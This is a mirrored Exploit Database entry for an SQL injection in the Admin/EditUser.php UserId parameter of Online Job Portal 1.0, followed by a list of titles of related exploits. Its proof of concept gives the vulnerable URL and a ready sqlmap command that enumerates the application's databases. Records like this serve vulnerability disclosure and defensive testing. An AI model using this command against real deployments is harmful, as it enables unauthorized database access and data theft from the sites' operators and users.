Online Job Portal 1.0 – ‘userid’ SQL Injection

Exploit Database
16 阅读

作者： Akıner Kısa

日期： 2020-10-30
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/48976/

# Exploit Title: Online Job Portal 1.0 - 'userid' SQL Injection
# Google Dork: N/A
# Date: 2020/10/28
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: XAMPP 
# CVE : N/A

# Vulnerable URL: http://localhost/jobportal/Admin/EditUser.php?UserId='

Proof of Concept:

1. See vulnerable url.

2. Open sqlmap and use " sqlmap -u "http://localhost/jobportal/Admin/EditUser.php?UserId='" --dbs " command.

last Exploits
Online Job Portal 1.0 – ‘userid’ SQL Injection的更多信息

Moab < 7.2.9 - Authentication Bypass：
Human Resource Management System v1.0 – Multiple SQLi：
WordPress Plugin Pica Photo Gallery 1.0 – Arbitrary File Upload：
OL-Commerce – ‘/OL-Commerce/admin/create_account.php?entry_country_id’ SQL Injection：
Telmanik CMS Press 1.01b – ‘pages.php?page_name’ SQL Injection：
Sharetronix 3.3 – Multiple Vulnerabilities：
XAMPP for Windows 1.8.2 – Blind SQL Injection：
WordPress Plugin Redirect 404 to Parent 1.3.0 – Reflected Cross-Site Scripting：